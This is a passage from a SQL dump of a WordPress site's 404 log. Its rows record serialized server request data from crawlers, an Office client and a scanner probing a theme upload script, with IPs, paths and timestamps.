Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"BCE5B328-B5A6-4950-BDFA-B1B22760D36A\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZaRic1AW5Yhg56lSglcUQAAABM\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:10:\"1.32.27.67\";s:11:\"REMOTE_PORT\";s:5:\"60559\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZaRic1AW5Yhg56lSglcUQAAABM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570148745.9271\";s:12:\"REQUEST_TIME\";s:10:\"1570148745\";}}','notice','2019-10-04 00:25:48','2019-10-04 00:25:46',35871320,37670792,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'1.32.27.67'),(27471,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:18:\"http://bintara.net\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.126.230.216\";s:11:\"REMOTE_PORT\";s:5:\"35275\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZaP8FwBui0WThkqL3MrHQAAANA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570148336.4398\";s:12:\"REQUEST_TIME\";s:10:\"1570148336\";}}','notice','2019-10-04 00:18:58','2019-10-04 00:18:56',35111408,36923752,'https://bintara.com.my/?page_id=18',1,0,'192.126.230.216'),(27470,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:18:\"http://bintara.net\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.126.230.216\";s:11:\"REMOTE_PORT\";s:5:\"42696\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZaP7Ajr9uyDpFBVNuJrBAAAAIo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1570148332.76\";s:12:\"REQUEST_TIME\";s:10:\"1570148332\";}}','notice','2019-10-04 00:18:54','2019-10-04 00:18:53',35111408,36923752,'https://bintara.com.my/?page_id=18',1,0,'192.126.230.216'),(27469,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:18:\"http://bintara.net\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.126.230.216\";s:11:\"REMOTE_PORT\";s:5:\"48382\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZaP5gjr9uyDpFBVNuJrAwAAAIA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570148327.064\";s:12:\"REQUEST_TIME\";s:10:\"1570148327\";}}','notice','2019-10-04 00:18:51','2019-10-04 00:18:47',35111408,36923752,'https://bintara.com.my/?page_id=18',1,0,'192.126.230.216'),(27468,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:18:\"http://bintara.net\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.126.230.216\";s:11:\"REMOTE_PORT\";s:5:\"52050\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZaP4c1AW5Yhg56lSglbUgAAAAI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570148321.8076\";s:12:\"REQUEST_TIME\";s:10:\"1570148321\";}}','notice','2019-10-04 00:18:45','2019-10-04 00:18:42',35503736,37314912,'https://bintara.com.my/?page_id=18',1,0,'192.126.230.216'),(27467,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/my-account/lost-password/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:198:\"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/my-account/lost-password/\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/my-account/lost-password/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZaE1D@rwVdoesi3d1zpygAAAVU\";s:12:\"REDIRECT_URL\";s:26:\"/my-account/lost-password/\";s:11:\"REMOTE_ADDR\";s:11:\"66.249.71.1\";s:11:\"REMOTE_PORT\";s:5:\"35377\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:48:\"https://bintara.com.my/my-account/lost-password/\";s:10:\"SCRIPT_URL\";s:26:\"/my-account/lost-password/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZaE1D@rwVdoesi3d1zpygAAAVU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570145492.4213\";s:12:\"REQUEST_TIME\";s:10:\"1570145492\";}}','notice','2019-10-03 23:31:34','2019-10-03 23:31:32',34007280,34354936,'https://bintara.com.my/my-account/lost-password/',1,0,'66.249.71.1'),(27466,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/my-account/lost-password/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/my-account/lost-password/\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/my-account/lost-password/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZaEQs1AW5Yhg56lSglVmAAAAAY\";s:12:\"REDIRECT_URL\";s:26:\"/my-account/lost-password/\";s:11:\"REMOTE_ADDR\";s:12:\"66.249.71.31\";s:11:\"REMOTE_PORT\";s:5:\"58853\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:48:\"https://bintara.com.my/my-account/lost-password/\";s:10:\"SCRIPT_URL\";s:26:\"/my-account/lost-password/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZaEQs1AW5Yhg56lSglVmAAAAAY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570145347.0352\";s:12:\"REQUEST_TIME\";s:10:\"1570145347\";}}','notice','2019-10-03 23:29:08','2019-10-03 23:29:07',34006800,34354208,'https://bintara.com.my/my-account/lost-password/',1,0,'66.249.71.31'),(27465,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:65:\"/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:22:\"python-requests/2.22.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:87:\"https://bintara.com.my/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:65:\"/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZZQDs1AW5Yhg56lSglKQgAAAAU\";s:19:\"REDIRECT_SCRIPT_URI\";s:87:\"https://bintara.com.my/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:65:\"/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZZQDs1AW5Yhg56lSglKQgAAAAU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"51.79.4.180\";s:11:\"REMOTE_PORT\";s:5:\"56558\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:87:\"https://bintara.com.my/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php\";s:10:\"SCRIPT_URL\";s:65:\"/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZZQDs1AW5Yhg56lSglKQgAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570131982.4691\";s:12:\"REQUEST_TIME\";s:10:\"1570131982\";}}','notice','2019-10-03 19:46:28','2019-10-03 19:46:23',35811864,37605824,'https://bintara.com.my/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php',1,0,'51.79.4.180'),(27464,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/1570122030053238100\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:14:\"euConsent=true\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/1570122030053238100\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/1570122030053238100\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZYpLSkdduukwg9cr3guSgAAANg\";s:12:\"REDIRECT_URL\";s:20:\"/1570122030053238100\";s:11:\"REMOTE_ADDR\";s:13:\"51.15.112.163\";s:11:\"REMOTE_PORT\";s:5:\"45328\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/1570122030053238100\";s:10:\"SCRIPT_URL\";s:20:\"/1570122030053238100\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZYpLSkdduukwg9cr3guSgAAANg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570122029.715\";s:12:\"REQUEST_TIME\";s:10:\"1570122029\";}}','notice','2019-10-03 17:00:35','2019-10-03 17:00:30',35149824,36961816,'https://bintara.com.my/1570122030053238100',1,0,'51.15.112.163'),(27401,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/blog/tag/logitech-vc/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; 